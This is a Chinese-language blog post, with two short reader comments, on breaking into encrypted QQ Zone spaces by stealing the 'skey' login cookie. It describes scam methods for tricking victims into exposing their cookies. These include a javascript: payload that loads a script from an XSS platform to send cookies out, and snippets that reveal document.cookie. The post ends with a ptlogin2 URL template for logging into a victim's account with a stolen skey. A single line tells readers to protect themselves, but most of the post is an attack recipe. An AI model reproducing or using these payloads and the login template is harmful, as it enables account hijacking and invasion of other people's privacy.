最近有很多网友问我,泪寒空间下载器可以访问加密空间吗?对于此类问题,我只能再明确的说明下,泪寒空间下载器仅仅是一个下载软件,不具备所谓的破解功能。
那怎样才能破解QQ空间呢?下面顺便再介绍下传说中突破QQ空间的方法吧!
首先介绍一下COOKIE
Cookie的使用很普遍,基本存在登录功能的网站都是利用Cookie来辨认使用者,以方便调出使用者所对应的内容。
说白了,cookie就是网站在你本地保存的一串字符串,相当于给你一个临时身份证,方便网站识别你的身份,呈现出与你权限相对应的内容。
那么,此处就可以利用了,假如我能弄到某个Q号的cookies(即临时身份证),那我就能以这个Q号的主人身份登录QQ空间,也就是说,什么空间加密,相册加密都没用,我就是这个Q的主人,还加密个鸟!!
再深入一点,QQ空间是怎么通过cookie识别你的身份的呢?
简单的说,QQ空间仅仅是通过cookies中的skey这个参数的值来进行身份验证,有了skey,你就相当于可以绕过QQ的登陆权限,那问题就简单了,我们只需要得到这个值就可以了。如果你想看你的QQ空间的SKEY,就拖动下面的文字到书签保存,再进入到QQ空间,点击刚刚保存的书签,就会弹出你的cookies。
常见骗取COOKIE方式:
1.让你检测空间,然后让你截图给他看。
空间助手的检测地址:
http://user.qzone.qq.com/troubleshooter
该地址是监测空间是否能正常登陆的连接。进去后腾讯会监测你本地信息,同时会有个日志输出,最先输出的就是cookie信息了。
所以,一般骗子会让你把滚动条拉到最上面给他截个图过去。截图过去,他就看到你的QQSKEY了哦。
注:该方法在pc端已经失效,但在移动端依然有效。
2.让你进入空间,然后让你执行js脚本给他看。
比如:
javascript:document.body.innerHTML=document.write("<script src=http://xss.***.com/***></script>");
上面这段代码,执行后,会把你QQ的cookie信息发送到对应的XSS平台,同一时间,骗子就得到你的cookie了。或者会让你执行js代码,给他截图看。
如下:
javascript:alert(document.cookie); 或 javascript:document.body.innerHTML=document.cookie;
3.给你发一段链接,让你打开。
来源是腾讯平台的,检测当然是安全的,但当你打开后,很抱歉,你中招了,骗子已经同一时间得到了你的cookie,这类骗子的技术含量就很高了,因为他手头有腾讯平台的未被公开修复xss漏洞,原理同2.1,只是不需要你自己去插入执行,骗子已经插好,等着你打开执行而已。
好了,其他情况就不一一列举了,大家害人之心不可有,防人之心不可无。
得到skey后呢?很多人使用第三方的Qkey登录软件,其实这是非常不安全的,谁能保证网络上下载的这些免费软件不捆绑木马病毒呢?其实腾讯本身就提供了一个登录通道,得到skey后,只需要构造如下网站,打开就可以直接进入
http://ptlogin2.qq.com/jump?u1=http%3A%2F%2Fuser.qzone.qq.com&uin=QQ号码&skey=得到的SKEY
0X5
最后,别说什么没卵用,这是给菜鸟看的,不是给大神看的,大神请自行绕道。
现在还行吗
失效了吧~。。